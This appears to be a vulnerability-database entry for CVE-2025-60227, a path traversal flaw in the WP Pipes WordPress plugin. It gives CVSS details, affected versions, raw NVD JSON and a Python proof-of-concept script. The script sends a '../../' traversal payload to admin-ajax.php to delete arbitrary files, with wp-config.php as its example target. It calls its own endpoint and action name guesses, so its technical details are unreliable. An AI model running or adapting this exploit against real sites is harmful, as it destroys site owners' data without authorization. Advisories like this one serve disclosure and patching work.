Security Vulnerability Report
中文
CVE-2025-60227 CVSS 8.6 HIGH

CVE-2025-60227

Published: 2025-10-22 15:16:00
Last Modified: 2026-04-27 16:16:34

Description

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in ThimPress WP Pipes wp-pipes allows Path Traversal.This issue affects WP Pipes: from n/a through <= 1.4.3.

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:thimpress:wp_pipes:*:*:*:*:*:wordpress:*:* - VULNERABLE
WP Pipes <= 1.4.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-60227 Path Traversal PoC for WordPress WP Pipes <= 1.4.3 # This PoC demonstrates arbitrary file deletion via path traversal import requests import argparse def exploit_wp_pipes(target_url, file_to_delete): """ Exploit path traversal vulnerability in WP Pipes plugin to delete arbitrary files """ # Target endpoint - adjust based on actual vulnerable endpoint endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Path traversal payload to delete arbitrary files # Using ../../ to traverse directory structure malicious_path = "../../" * 5 + file_to_delete # Prepare the exploit payload payload = { "action": "wp_pipes_delete_file", "file_path": malicious_path } print(f"[*] Targeting: {target_url}") print(f"[*] Attempting to delete: {file_to_delete}") print(f"[*] Payload: {malicious_path}") try: response = requests.post(endpoint, data=payload, timeout=10) if response.status_code == 200: print(f"[+] Request sent successfully") print(f"[*] Response: {response.text}") # Check if file deletion was successful if "success" in response.text.lower() or response.status_code == 200: print(f"[!] File deletion may have been successful") else: print(f"[*] Response indicates potential failure") else: print(f"[-] Request failed with status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") # Example usage: # python exploit.py -t http://target.com -f wp-config.php if __name__ == "__main__": parser = argparse.ArgumentParser(description="CVE-2025-60227 WP Pipes Exploit") parser.add_argument("-t", "--target", required=True, help="Target WordPress site URL") parser.add_argument("-f", "--file", required=True, help="File to delete (e.g., wp-config.php)") args = parser.parse_args() exploit_wp_pipes(args.target, args.file)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60227", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:59.877", "lastModified": "2026-04-27T16:16:33.870", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in ThimPress WP Pipes wp-pipes allows Path Traversal.This issue affects WP Pipes: from n/a through <= 1.4.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:thimpress:wp_pipes:*:*:*:*:*:wordpress:*:*", "versionEndIncluding": "1.4.3", "matchCriteriaId": "9EAB3BBD-1B78-4996-9E43-9294EB529207"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-pipes/vulnerability/wordpress-wp-pipes-plugin-1-4-3-arbitrary-file-deletion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}